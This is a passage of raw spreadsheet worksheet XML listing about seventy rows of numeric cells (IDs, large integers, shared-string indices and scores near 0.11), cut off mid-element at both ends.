      </c>
      <c r="D4073" s="2">
        <v>1.0</v>
      </c>
      <c r="E4073" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4073" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4074" ht="15.75" customHeight="1">
      <c r="A4074" s="1">
        <v>20455.0</v>
      </c>
      <c r="B4074" s="2">
        <v>1.2538902E7</v>
      </c>
      <c r="C4074" s="2" t="s">
        <v>3867</v>
      </c>
      <c r="D4074" s="2">
        <v>1.0</v>
      </c>
      <c r="E4074" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4074" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4075" ht="15.75" customHeight="1">
      <c r="A4075" s="1">
        <v>21868.0</v>
      </c>
      <c r="B4075" s="2">
        <v>2.7434374E7</v>
      </c>
      <c r="C4075" s="2" t="s">
        <v>3868</v>
      </c>
      <c r="D4075" s="2">
        <v>1.0</v>
      </c>
      <c r="E4075" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4075" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4076" ht="15.75" customHeight="1">
      <c r="A4076" s="1">
        <v>24922.0</v>
      </c>
      <c r="B4076" s="2">
        <v>1.2400762E7</v>
      </c>
      <c r="C4076" s="2" t="s">
        <v>3869</v>
      </c>
      <c r="D4076" s="2">
        <v>1.0</v>
      </c>
      <c r="E4076" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4076" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4077" ht="15.75" customHeight="1">
      <c r="A4077" s="1">
        <v>25482.0</v>
      </c>
      <c r="B4077" s="2">
        <v>1.4028153E7</v>
      </c>
      <c r="C4077" s="2" t="s">
        <v>3870</v>
      </c>
      <c r="D4077" s="2">
        <v>1.0</v>
      </c>
      <c r="E4077" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4077" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4078" ht="15.75" customHeight="1">
      <c r="A4078" s="1">
        <v>25539.0</v>
      </c>
      <c r="B4078" s="2">
        <v>1.42545E7</v>
      </c>
      <c r="C4078" s="2" t="s">
        <v>3871</v>
      </c>
      <c r="D4078" s="2">
        <v>1.0</v>
      </c>
      <c r="E4078" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4078" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4079" ht="15.75" customHeight="1">
      <c r="A4079" s="1">
        <v>30345.0</v>
      </c>
      <c r="B4079" s="2">
        <v>3.8215277E7</v>
      </c>
      <c r="C4079" s="2" t="s">
        <v>3872</v>
      </c>
      <c r="D4079" s="2">
        <v>1.0</v>
      </c>
      <c r="E4079" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4079" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4080" ht="15.75" customHeight="1">
      <c r="A4080" s="1">
        <v>30645.0</v>
      </c>
      <c r="B4080" s="2">
        <v>4174659.0</v>
      </c>
      <c r="C4080" s="2" t="s">
        <v>3873</v>
      </c>
      <c r="D4080" s="2">
        <v>1.0</v>
      </c>
      <c r="E4080" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4080" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4081" ht="15.75" customHeight="1">
      <c r="A4081" s="1">
        <v>31408.0</v>
      </c>
      <c r="B4081" s="2">
        <v>5.0058195E7</v>
      </c>
      <c r="C4081" s="2" t="s">
        <v>3874</v>
      </c>
      <c r="D4081" s="2">
        <v>1.0</v>
      </c>
      <c r="E4081" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4081" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4082" ht="15.75" customHeight="1">
      <c r="A4082" s="1">
        <v>31933.0</v>
      </c>
      <c r="B4082" s="2">
        <v>5305124.0</v>
      </c>
      <c r="C4082" s="2" t="s">
        <v>3875</v>
      </c>
      <c r="D4082" s="2">
        <v>1.0</v>
      </c>
      <c r="E4082" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4082" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4083" ht="15.75" customHeight="1">
      <c r="A4083" s="1">
        <v>32987.0</v>
      </c>
      <c r="B4083" s="2">
        <v>6603805.0</v>
      </c>
      <c r="C4083" s="2" t="s">
        <v>3876</v>
      </c>
      <c r="D4083" s="2">
        <v>1.0</v>
      </c>
      <c r="E4083" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4083" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4084" ht="15.75" customHeight="1">
      <c r="A4084" s="1">
        <v>630.0</v>
      </c>
      <c r="B4084" s="2">
        <v>1.9662798E7</v>
      </c>
      <c r="C4084" s="2" t="s">
        <v>3877</v>
      </c>
      <c r="D4084" s="2">
        <v>1.0</v>
      </c>
      <c r="E4084" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4084" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="4085" ht="15.75" customHeight="1">
      <c r="A4085" s="1">
        <v>4131.0</v>
      </c>
      <c r="B4085" s="2">
        <v>4.1385095E7</v>
      </c>
      <c r="C4085" s="2" t="s">
        <v>3878</v>
      </c>
      <c r="D4085" s="2">
        <v>1.0</v>
      </c>
      <c r="E4085" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4085" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="4086" ht="15.75" customHeight="1">
      <c r="A4086" s="1">
        <v>9713.0</v>
      </c>
      <c r="B4086" s="2">
        <v>5.6391524E7</v>
      </c>
      <c r="C4086" s="2" t="s">
        <v>3879</v>
      </c>
      <c r="D4086" s="2">
        <v>1.0</v>
      </c>
      <c r="E4086" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4086" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="4087" ht="15.75" customHeight="1">
      <c r="A4087" s="1">
        <v>10390.0</v>
      </c>
      <c r="B4087" s="2">
        <v>8700469.0</v>
      </c>
      <c r="C4087" s="2" t="s">
        <v>3880</v>
      </c>
      <c r="D4087" s="2">
        <v>1.0</v>
      </c>
      <c r="E4087" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4087" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="4088" ht="15.75" customHeight="1">
      <c r="A4088" s="1">
        <v>15454.0</v>
      </c>
      <c r="B4088" s="2">
        <v>4.3052553E7</v>
      </c>
      <c r="C4088" s="2" t="s">
        <v>3881</v>
      </c>
      <c r="D4088" s="2">
        <v>1.0</v>
      </c>
      <c r="E4088" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4088" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="4089" ht="15.75" customHeight="1">
      <c r="A4089" s="1">
        <v>27782.0</v>
      </c>
      <c r="B4089" s="2">
        <v>2.3127582E7</v>
      </c>
      <c r="C4089" s="2" t="s">
        <v>3882</v>
      </c>
      <c r="D4089" s="2">
        <v>1.0</v>
      </c>
      <c r="E4089" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4089" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="4090" ht="15.75" customHeight="1">
      <c r="A4090" s="1">
        <v>28320.0</v>
      </c>
      <c r="B4090" s="2">
        <v>2.5805647E7</v>
      </c>
      <c r="C4090" s="2" t="s">
        <v>3883</v>
      </c>
      <c r="D4090" s="2">
        <v>1.0</v>
      </c>
      <c r="E4090" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4090" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="4091" ht="15.75" customHeight="1">
      <c r="A4091" s="1">
        <v>30272.0</v>
      </c>
      <c r="B4091" s="2">
        <v>3.7685835E7</v>
      </c>
      <c r="C4091" s="2" t="s">
        <v>3884</v>
      </c>
      <c r="D4091" s="2">
        <v>1.0</v>
      </c>
      <c r="E4091" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4091" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="4092" ht="15.75" customHeight="1">
      <c r="A4092" s="1">
        <v>2667.0</v>
      </c>
      <c r="B4092" s="2">
        <v>3.4727331E7</v>
      </c>
      <c r="C4092" s="2" t="s">
        <v>3885</v>
      </c>
      <c r="D4092" s="2">
        <v>1.0</v>
      </c>
      <c r="E4092" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4092" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="4093" ht="15.75" customHeight="1">
      <c r="A4093" s="1">
        <v>10199.0</v>
      </c>
      <c r="B4093" s="2">
        <v>5.7402525E7</v>
      </c>
      <c r="C4093" s="2" t="s">
        <v>3886</v>
      </c>
      <c r="D4093" s="2">
        <v>1.0</v>
      </c>
      <c r="E4093" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4093" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="4094" ht="15.75" customHeight="1">
      <c r="A4094" s="1">
        <v>15922.0</v>
      </c>
      <c r="B4094" s="2">
        <v>4.4685824E7</v>
      </c>
      <c r="C4094" s="2" t="s">
        <v>3887</v>
      </c>
      <c r="D4094" s="2">
        <v>1.0</v>
      </c>
      <c r="E4094" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4094" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="4095" ht="15.75" customHeight="1">
      <c r="A4095" s="1">
        <v>5352.0</v>
      </c>
      <c r="B4095" s="2">
        <v>4.5364877E7</v>
      </c>
      <c r="C4095" s="2" t="s">
        <v>3888</v>
      </c>
      <c r="D4095" s="2">
        <v>1.0</v>
      </c>
      <c r="E4095" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4095" s="2">
        <v>0.1120527306967985</v>
      </c>
    </row>
    <row r="4096" ht="15.75" customHeight="1">
      <c r="A4096" s="1">
        <v>16769.0</v>
      </c>
      <c r="B4096" s="2">
        <v>4.768286E7</v>
      </c>
      <c r="C4096" s="2" t="s">
        <v>3889</v>
      </c>
      <c r="D4096" s="2">
        <v>1.0</v>
      </c>
      <c r="E4096" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4096" s="2">
        <v>0.1120527306967985</v>
      </c>
    </row>
    <row r="4097" ht="15.75" customHeight="1">
      <c r="A4097" s="1">
        <v>17270.0</v>
      </c>
      <c r="B4097" s="2">
        <v>4.9166854E7</v>
      </c>
      <c r="C4097" s="2" t="s">
        <v>3890</v>
      </c>
      <c r="D4097" s="2">
        <v>1.0</v>
      </c>
      <c r="E4097" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4097" s="2">
        <v>0.1120527306967985</v>
      </c>
    </row>
    <row r="4098" ht="15.75" customHeight="1">
      <c r="A4098" s="1">
        <v>5849.0</v>
      </c>
      <c r="B4098" s="2">
        <v>4.6930122E7</v>
      </c>
      <c r="C4098" s="2" t="s">
        <v>3891</v>
      </c>
      <c r="D4098" s="2">
        <v>1.0</v>
      </c>
      <c r="E4098" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4098" s="2">
        <v>0.112037037037037</v>
      </c>
    </row>
    <row r="4099" ht="15.75" customHeight="1">
      <c r="A4099" s="1">
        <v>12691.0</v>
      </c>
      <c r="B4099" s="2">
        <v>3.0716325E7</v>
      </c>
      <c r="C4099" s="2" t="s">
        <v>3892</v>
      </c>
      <c r="D4099" s="2">
        <v>1.0</v>
      </c>
      <c r="E4099" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4099" s="2">
        <v>0.112037037037037</v>
      </c>
    </row>
    <row r="4100" ht="15.75" customHeight="1">
      <c r="A4100" s="1">
        <v>17060.0</v>
      </c>
      <c r="B4100" s="2">
        <v>4.8557755E7</v>
      </c>
      <c r="C4100" s="2" t="s">
        <v>3893</v>
      </c>
      <c r="D4100" s="2">
        <v>1.0</v>
      </c>
      <c r="E4100" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4100" s="2">
        <v>0.112037037037037</v>
      </c>
    </row>
    <row r="4101" ht="15.75" customHeight="1">
      <c r="A4101" s="1">
        <v>17319.0</v>
      </c>
      <c r="B4101" s="2">
        <v>4.9335884E7</v>
      </c>
      <c r="C4101" s="2" t="s">
        <v>3894</v>
      </c>
      <c r="D4101" s="2">
        <v>1.0</v>
      </c>
      <c r="E4101" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4101" s="2">
        <v>0.112037037037037</v>
      </c>
    </row>
    <row r="4102" ht="15.75" customHeight="1">
      <c r="A4102" s="1">
        <v>29172.0</v>
      </c>
      <c r="B4102" s="2">
        <v>3.0698839E7</v>
      </c>
      <c r="C4102" s="2" t="s">
        <v>3895</v>
      </c>
      <c r="D4102" s="2">
        <v>1.0</v>
      </c>
      <c r="E4102" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4102" s="2">
        <v>0.112037037037037</v>
      </c>
    </row>
    <row r="4103" ht="15.75" customHeight="1">
      <c r="A4103" s="1">
        <v>8964.0</v>
      </c>
      <c r="B4103" s="2">
        <v>5.4927969E7</v>
      </c>
      <c r="C4103" s="2" t="s">
        <v>3896</v>
      </c>
      <c r="D4103" s="2">
        <v>1.0</v>
      </c>
      <c r="E4103" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4103" s="2">
        <v>0.1120218579234973</v>
      </c>
    </row>
    <row r="4104" ht="15.75" customHeight="1">
      <c r="A4104" s="1">
        <v>3537.0</v>
      </c>
      <c r="B4104" s="2">
        <v>3.868905E7</v>
      </c>
      <c r="C4104" s="2" t="s">
        <v>3897</v>
      </c>
      <c r="D4104" s="2">
        <v>1.0</v>
      </c>
      <c r="E4104" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4104" s="2">
        <v>0.1120218579234972</v>
      </c>
    </row>
    <row r="4105" ht="15.75" customHeight="1">
      <c r="A4105" s="1">
        <v>15370.0</v>
      </c>
      <c r="B4105" s="2">
        <v>4.2728066E7</v>
      </c>
      <c r="C4105" s="2" t="s">
        <v>3898</v>
      </c>
      <c r="D4105" s="2">
        <v>1.0</v>
      </c>
      <c r="E4105" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4105" s="2">
        <v>0.1120218579234972</v>
      </c>
    </row>
    <row r="4106" ht="15.75" customHeight="1">
      <c r="A4106" s="1">
        <v>16370.0</v>
      </c>
      <c r="B4106" s="2">
        <v>4.6150117E7</v>
      </c>
      <c r="C4106" s="2" t="s">
        <v>3899</v>
      </c>
      <c r="D4106" s="2">
        <v>1.0</v>
      </c>
      <c r="E4106" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4106" s="2">
        <v>0.1120071684587814</v>
      </c>
    </row>
    <row r="4107" ht="15.75" customHeight="1">
      <c r="A4107" s="1">
        <v>28445.0</v>
      </c>
      <c r="B4107" s="2">
        <v>2.6516652E7</v>
      </c>
      <c r="C4107" s="2" t="s">
        <v>3900</v>
      </c>
      <c r="D4107" s="2">
        <v>1.0</v>
      </c>
      <c r="E4107" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4107" s="2">
        <v>0.1119929453262787</v>
      </c>
    </row>
    <row r="4108" ht="15.75" customHeight="1">
      <c r="A4108" s="1">
        <v>9566.0</v>
      </c>
      <c r="B4108" s="2">
        <v>5.6050707E7</v>
      </c>
      <c r="C4108" s="2" t="s">
        <v>3901</v>
      </c>
      <c r="D4108" s="2">
        <v>1.0</v>
      </c>
      <c r="E4108" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4108" s="2">
        <v>0.1119791666666667</v>
      </c>
    </row>
    <row r="4109" ht="15.75" customHeight="1">
      <c r="A4109" s="1">
        <v>10728.0</v>
      </c>
      <c r="B4109" s="2">
        <v>1.5248315E7</v>
      </c>
      <c r="C4109" s="2" t="s">
        <v>3902</v>
      </c>
      <c r="D4109" s="2">
        <v>1.0</v>
      </c>
      <c r="E4109" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4109" s="2">
        <v>0.1119791666666667</v>
      </c>
    </row>
    <row r="4110" ht="15.75" customHeight="1">
      <c r="A4110" s="1">
        <v>33522.0</v>
      </c>
      <c r="B4110" s="2">
        <v>8101820.0</v>
      </c>
      <c r="C4110" s="2" t="s">
        <v>3903</v>
      </c>
      <c r="D4110" s="2">
        <v>1.0</v>
      </c>
      <c r="E4110" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4110" s="2">
        <v>0.1103603603603604</v>
      </c>
    </row>
    <row r="4111" ht="15.75" customHeight="1">
      <c r="A4111" s="1">
        <v>3879.0</v>
      </c>
      <c r="B4111" s="2">
        <v>4.0349858E7</v>
      </c>
      <c r="C4111" s="2" t="s">
        <v>3904</v>
      </c>
      <c r="D4111" s="2">
        <v>1.0</v>
      </c>
      <c r="E4111" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4111" s="2">
        <v>0.1103059581320451</v>
      </c>
    </row>
    <row r="4112" ht="15.75" customHeight="1">
      <c r="A4112" s="1">
        <v>26351.0</v>
      </c>
      <c r="B4112" s="2">
        <v>1.6805756E7</v>
      </c>
      <c r="C4112" s="2" t="s">
        <v>3905</v>
      </c>
      <c r="D4112" s="2">
        <v>1.0</v>
      </c>
      <c r="E4112" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4112" s="2">
        <v>0.1102819237147595</v>
      </c>
    </row>
    <row r="4113" ht="15.75" customHeight="1">
      <c r="A4113" s="1">
        <v>13419.0</v>
      </c>
      <c r="B4113" s="2">
        <v>3.5063138E7</v>
      </c>
      <c r="C4113" s="2" t="s">
        <v>3906</v>
      </c>
      <c r="D4113" s="2">
        <v>1.0</v>
      </c>
      <c r="E4113" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4113" s="2">
        <v>0.1102564102564103</v>
      </c>
    </row>
    <row r="4114" ht="15.75" customHeight="1">
      <c r="A4114" s="1">
        <v>32699.0</v>
      </c>
      <c r="B4114" s="2">
        <v>5953884.0</v>
      </c>
      <c r="C4114" s="2" t="s">
        <v>3907</v>
      </c>
      <c r="D4114" s="2">
        <v>1.0</v>
      </c>
      <c r="E4114" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4114" s="2">
        <v>0.1102564102564103</v>
      </c>
    </row>
    <row r="4115" ht="15.75" customHeight="1">
      <c r="A4115" s="1">
        <v>23058.0</v>
      </c>
      <c r="B4115" s="2">
        <v>5.0307335E7</v>
      </c>
      <c r="C4115" s="2" t="s">
        <v>3908</v>
      </c>
      <c r="D4115" s="2">
        <v>1.0</v>
      </c>
      <c r="E4115" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4115" s="2">
        <v>0.1102430555555556</v>
      </c>
    </row>
    <row r="4116" ht="15.75" customHeight="1">
      <c r="A4116" s="1">
        <v>6878.0</v>
      </c>
      <c r="B4116" s="2">
        <v>4.9721134E7</v>
      </c>
      <c r="C4116" s="2" t="s">
        <v>3909</v>
      </c>
      <c r="D4116" s="2">
        <v>1.0</v>
      </c>
      <c r="E4116" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4116" s="2">
        <v>0.1102150537634408</v>
      </c>
    </row>
    <row r="4117" ht="15.75" customHeight="1">
      <c r="A4117" s="1">
        <v>13933.0</v>
      </c>
      <c r="B4117" s="2">
        <v>3.7125029E7</v>
      </c>
      <c r="C4117" s="2" t="s">
        <v>3910</v>
      </c>
      <c r="D4117" s="2">
        <v>1.0</v>
      </c>
      <c r="E4117" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4117" s="2">
        <v>0.1102003642987249</v>
      </c>
    </row>
    <row r="4118" ht="15.75" customHeight="1">
      <c r="A4118" s="1">
        <v>4614.0</v>
      </c>
      <c r="B4118" s="2">
        <v>4.2914202E7</v>
      </c>
      <c r="C4118" s="2" t="s">
        <v>3911</v>
      </c>
      <c r="D4118" s="2">
        <v>1.0</v>
      </c>
      <c r="E4118" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4118" s="2">
        <v>0.1101851851851852</v>
      </c>
    </row>
    <row r="4119" ht="15.75" customHeight="1">
      <c r="A4119" s="1">
        <v>10760.0</v>
      </c>
      <c r="B4119" s="2">
        <v>1.5532079E7</v>
      </c>
      <c r="C4119" s="2" t="s">
        <v>3912</v>
      </c>
      <c r="D4119" s="2">
        <v>1.0</v>
      </c>
      <c r="E4119" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4119" s="2">
        <v>0.1101851851851852</v>
      </c>
    </row>
    <row r="4120" ht="15.75" customHeight="1">
      <c r="A4120" s="1">
        <v>12793.0</v>
      </c>
      <c r="B4120" s="2">
        <v>3.1391453E7</v>
      </c>
      <c r="C4120" s="2" t="s">
        <v>3913</v>
      </c>
      <c r="D4120" s="2">
        <v>1.0</v>
      </c>
      <c r="E4120" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4120" s="2">
        <v>0.1101851851851852</v>
      </c>
    </row>
    <row r="4121" ht="15.75" customHeight="1">
      <c r="A4121" s="1">
        <v>9847.0</v>
      </c>
      <c r="B4121" s="2">
        <v>5.6688162E7</v>
      </c>
      <c r="C4121" s="2" t="s">
        <v>3914</v>
      </c>
      <c r="D4121" s="2">
        <v>1.0</v>
      </c>
      <c r="E4121" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4121" s="2">
        <v>0.1101694915254237</v>
      </c>
    </row>
    <row r="4122" ht="15.75" customHeight="1">
      <c r="A4122" s="1">
        <v>20278.0</v>
      </c>
      <c r="B4122" s="2">
        <v>1.1153375E7</v>
      </c>
      <c r="C4122" s="2" t="s">
        <v>3915</v>
      </c>
      <c r="D4122" s="2">
        <v>1.0</v>
      </c>
      <c r="E4122" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4122" s="2">
        <v>0.1101694915254237</v>
      </c>
    </row>
    <row r="4123" ht="15.75" customHeight="1">
      <c r="A4123" s="1">
        <v>27675.0</v>
      </c>
      <c r="B4123" s="2">
        <v>2.2932229E7</v>
      </c>
      <c r="C4123" s="2" t="s">
        <v>3916</v>
      </c>
      <c r="D4123" s="2">
        <v>1.0</v>
      </c>
      <c r="E4123" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4123" s="2">
        <v>0.1101694915254237</v>
      </c>
    </row>
    <row r="4124" ht="15.75" customHeight="1">
      <c r="A4124" s="1">
        <v>34268.0</v>
      </c>
      <c r="B4124" s="2">
        <v>1.5111874E7</v>
      </c>
      <c r="C4124" s="2" t="s">
        <v>3917</v>
      </c>
      <c r="D4124" s="2">
        <v>1.0</v>
      </c>
      <c r="E4124" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4124" s="2">
        <v>0.1101694915254237</v>
      </c>
    </row>
    <row r="4125" ht="15.75" customHeight="1">
      <c r="A4125" s="1">
        <v>531.0</v>
      </c>
      <c r="B4125" s="2">
        <v>1.8508406E7</v>
      </c>
      <c r="C4125" s="2" t="s">
        <v>3918</v>
      </c>
      <c r="D4125" s="2">
        <v>1.0</v>
      </c>
      <c r="E4125" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4125" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="4126" ht="15.75" customHeight="1">
      <c r="A4126" s="1">
        <v>1326.0</v>
      </c>
      <c r="B4126" s="2">
        <v>2.5780445E7</v>
      </c>
      <c r="C4126" s="2" t="s">
        <v>3919</v>
      </c>
      <c r="D4126" s="2">
        <v>1.0</v>
      </c>
      <c r="E4126" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4126" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="4127" ht="15.75" customHeight="1">
      <c r="A4127" s="1">
        <v>1420.0</v>
      </c>
      <c r="B4127" s="2">
        <v>2.6546814E7</v>
      </c>
      <c r="C4127" s="2" t="s">
        <v>3920</v>
      </c>
      <c r="D4127" s="2">
        <v>1.0</v>
      </c>
      <c r="E4127" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4127" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="4128" ht="15.75" customHeight="1">
      <c r="A4128" s="1">
        <v>7360.0</v>
      </c>
      <c r="B4128" s="2">
        <v>5.1003393E7</v>
      </c>
      <c r="C4128" s="2" t="s">
        <v>3921</v>
      </c>
      <c r="D4128" s="2">
        <v>1.0</v>
      </c>
      <c r="E4128" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4128" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="4129" ht="15.75" customHeight="1">
      <c r="A4129" s="1">
        <v>19575.0</v>
      </c>
      <c r="B4129" s="2">
        <v>5.6149385E7</v>
      </c>
      <c r="C4129" s="2" t="s">
        <v>3922</v>
      </c>
      <c r="D4129" s="2">
        <v>1.0</v>
      </c>
      <c r="E4129" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4129" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="4130" ht="15.75" customHeight="1">
      <c r="A4130" s="1">
        <v>1512.0</v>
      </c>
      <c r="B4130" s="2">
        <v>2.7305636E7</v>
      </c>
      <c r="C4130" s="2" t="s">
        <v>3923</v>
      </c>
      <c r="D4130" s="2">
        <v>1.0</v>
      </c>
      <c r="E4130" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4130" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="4131" ht="15.75" customHeight="1">
      <c r="A4131" s="1">
        <v>7919.0</v>
      </c>
      <c r="B4131" s="2">
        <v>5.2521993E7</v>
      </c>
      <c r="C4131" s="2" t="s">
        <v>3924</v>
      </c>
      <c r="D4131" s="2">
        <v>1.0</v>
      </c>
      <c r="E4131" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4131" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="4132" ht="15.75" customHeight="1">
      <c r="A4132" s="1">
        <v>10509.0</v>
      </c>
      <c r="B4132" s="2">
        <v>1.157056E7</v>
      </c>
      <c r="C4132" s="2" t="s">
        <v>3925</v>
      </c>
      <c r="D4132" s="2">
        <v>1.0</v>
      </c>
      <c r="E4132" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4132" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="4133" ht="15.75" customHeight="1">
      <c r="A4133" s="1">
        <v>12251.0</v>
      </c>
      <c r="B4133" s="2">
        <v>2.7938951E7</v>
      </c>
      <c r="C4133" s="2" t="s">
        <v>3926</v>
      </c>
      <c r="D4133" s="2">
        <v>1.0</v>
      </c>
      <c r="E4133" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4133" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="4134" ht="15.75" customHeight="1">
      <c r="A4134" s="1">
        <v>12753.0</v>
      </c>
      <c r="B4134" s="2">
        <v>3.1126185E7</v>
      </c>
      <c r="C4134" s="2" t="s">
        <v>3927</v>
      </c>
      <c r="D4134" s="2">
        <v>1.0</v>
      </c>
      <c r="E4134" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4134" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="4135" ht="15.75" customHeight="1">
      <c r="A4135" s="1">
        <v>14441.0</v>
      </c>
      <c r="B4135" s="2">
        <v>3.933945E7</v>
      </c>
      <c r="C4135" s="2" t="s">
        <v>3928</v>
      </c>
      <c r="D4135" s="2">
        <v>1.0</v>
      </c>
      <c r="E4135" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4135" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="4136" ht="15.75" customHeight="1">
      <c r="A4136" s="1">
        <v>17521.0</v>
      </c>
      <c r="B4136" s="2">
        <v>5.0085479E7</v>
      </c>
      <c r="C4136" s="2" t="s">
        <v>3929</v>
      </c>
      <c r="D4136" s="2">
        <v>1.0</v>
      </c>
      <c r="E4136" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4136" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="4137" ht="15.75" customHeight="1">
      <c r="A4137" s="1">
        <v>17888.0</v>
      </c>
      <c r="B4137" s="2">
        <v>5.1053654E7</v>
      </c>
      <c r="C4137" s="2" t="s">
        <v>3930</v>
      </c>
      <c r="D4137" s="2">
        <v>1.0</v>
      </c>
      <c r="E4137" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4137" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="4138" ht="15.75" customHeight="1">
      <c r="A4138" s="1">
        <v>41.0</v>
      </c>
      <c r="B4138" s="2">
        <v>1.0737368E7</v>
      </c>
      <c r="C4138" s="2" t="s">
        <v>3931</v>
      </c>
      <c r="D4138" s="2">
        <v>1.0</v>
      </c>
      <c r="E4138" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4138" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4139" ht="15.75" customHeight="1">
      <c r="A4139" s="1">
        <v>51.0</v>
      </c>
      <c r="B4139" s="2">
        <v>1.0943494E7</v>
      </c>
      <c r="C4139" s="2" t="s">
        <v>3932</v>
      </c>
      <c r="D4139" s="2">
        <v>1.0</v>
      </c>
      <c r="E4139" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4139" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4140" ht="15.75" customHeight="1">
      <c r="A4140" s="1">
        <v>279.0</v>
      </c>
      <c r="B4140" s="2">
        <v>1.5317178E7</v>
      </c>
      <c r="C4140" s="2" t="s">
        <v>3933</v>
      </c>
      <c r="D4140" s="2">
